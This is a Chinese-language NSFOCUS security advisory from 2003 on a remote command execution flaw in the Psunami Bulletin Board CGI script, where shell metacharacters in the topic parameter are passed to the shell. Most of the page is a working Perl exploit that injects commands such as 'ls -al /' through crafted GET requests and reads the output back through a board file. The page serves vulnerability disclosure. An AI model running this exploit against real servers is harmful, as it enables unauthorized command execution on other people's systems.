首页 -> 安全研究
安全研究
安全漏洞
Psunami Bulletin Board psunami.cgi远程命令执行漏洞
发布日期:2003-01-14
更新日期:2003-01-21
受影响系统:
Psunami Bulletin Board Psunami Bulletin Board 0.5.2描述:
Psunami Bulletin Board Psunami Bulletin Board 0.5.1
Psunami Bulletin Board Psunami Bulletin Board 0.5
Psunami Bulletin Board Psunami Bulletin Board 0.4
Psunami Bulletin Board Psunami Bulletin Board 0.3.1
Psunami Bulletin Board Psunami Bulletin Board 0.3
Psunami Bulletin Board Psunami Bulletin Board 0.2.1
Psunami Bulletin Board Psunami Bulletin Board 0.2
BUGTRAQ ID: 6607
Psunami Bulletin Board是一款基于WEB的论坛程序。
Psunami Bulletin Board没有充分过滤来自查询字符串参数的SHELL元字符,远程攻击者可以利用这个漏洞以Web权限在系统上执行任意命令。
Psunami.cgi脚本对用户提交给topic参数的数据缺少正确过滤检查,攻击者提交包含SHELL元字符的数据(如|ls -al /|)给topic查询参数,可导致脚本直接传递给SHELL执行,以Web权限在系统上执行任意命令。
<*来源:dodo (dodo@fuckmicrosoft.com)
链接:http://www.securitybugware.org/Other/5930.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/perl
use IO::Socket;
#
#
#Psunami Bulletin Board CGI remote command execution
#tested on version 0.5.2
#
#
#
#PsunamiBB doesn't look for escape characters in the GET variables
#When u view a thread u can escape your command:
#
#http://127.0.0.1/cgi-bin/psunami.cgi?action=board&board=1&topic=1004527509
#U can execute your command by:
#http://127.0.0.1/cgi-bin/psunami.cgi?action=board&board=1&topic=|ls -al /|
#
#The command will be executed, however it will not be shown...
#This is perlscript makes use of the forum and displays your command
#
#
# usage: ./cgi.psunami.pl <hostname> <path> [urlenc cmd]
# example: /cgi.psunami.pl 127.0.0.1 /cgi-bin/board/psunami/ ls%20-al | tr -s \\\\v \\\\n
# //note: tr is used to convert the \n's to \v's and back, so it fits in the bbfiles
#
# u might have to adjust the wait times depending on connection and server
# when there is no results, u should try again, it's often a matter of multiple tries
# the server must also run tr, this is essential for this exploit to see the cmd output
#
#
#PsunamiBB:
#http://psunami.sf.net/
#
#author:
#dodo [dodo@fuckmicrosoft.com]
#
if(!$ARGV[0] || !$ARGV[1])
{
print "PsunamiBB remote execution CGI exploit\nby dodo [dodo@fuckmicrosoft.com]\n\n";
print "usage: ./cgi.psunami.pl <hostname> <path> [urlenc cmd]\n";
print "example: ./cgi.psunami.pl 127.0.0.1 /cgi-bin/board/psunami/ ls%20-al | tr -s \\\\v \\\\n \n\n";
print "if it doesnt seemwork, try adjusting the sleep times or try multiple times\nyour command output should be somewhere in the html output\n";
exit();
}
$path = $ARGV[1];
$host = $ARGV[0];
if (!$ARGV[2]) {
$cmd = "uname%20-a";
} else {
$cmd = $ARGV[2];
}
$port = 80;
$sleep = 2; #overal sleep
$sleep_view = 6;
$sleep_view2 = 4;
$append = "psunami.cgi?action=topic&board=1&topic=|echo%200::dodo::0::0::%3Epsunami/board1/dodo|";
$append1 = "psunami.cgi?action=topic&board=1&topic=|$cmd|tr%20-s%20\\\\n%20\\\\v%3E%3Epsunami/board1/dodo|";
$append2 = "psunami.cgi?action=topic&board=1&topic=|cat%20psunami/board1/dodo|tr%20-d%20\\\\n%20%3Epsunami/board1/dodo|";
$append3 = "psunami.cgi?action=topic&board=1&topic=dodo";
$append4 = "psunami.cgi?action=topic&board=1&topic=|rm%20psunami/board1/dodo|";
$i = 0;
while ($i<5)
{
$socket = new IO::Socket::INET (
Proto => "tcp",
PeerAddr => $host,
PeerPort => $port,
);
die "unable to connect to $host:$port ($!)\n" unless $socket;
if ($i eq 0) {
print $socket "GET $path$append\nHTTP/1.0\n";
print "sending 1\n";
sleep $sleep;
}
if ($i eq 1) {
print $socket "GET $path$append1\nHTTP/1.0\n";
print "sending 2\n";
}
if ($i eq 2) {
print $socket "GET $path$append2\nHTTP/1.0\n";
print "sending 3\n";
}
if ($i eq 3) {
print "receiving data\n";
sleep $sleep_view;
print $socket "GET $path$append3\nHTTP/1.0\n";
while (defined($line = <$socket>)) {
$recv .= $line;
}
sleep $sleep_view2;
}
if ($i eq 4) {
print "cleaning up...";
sleep $sleep;
print $socket "GET $path$append4\nHTTP/1.0\n";
print "done\n";
}
close($socket);
$i++;
}
print $recv;
print "the above is received from the server, if you have a 404 or 403, theres somethin wrong
if not, and no command output, try again..
if command ouput buggy, convert \\v to \\n with tr\n";
建议:
厂商补丁:
Psunami Bulletin Board
----------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://sourceforge.net/projects/psunami
浏览次数:2800
严重程度:0(网友投票)
绿盟科技给您安全的保障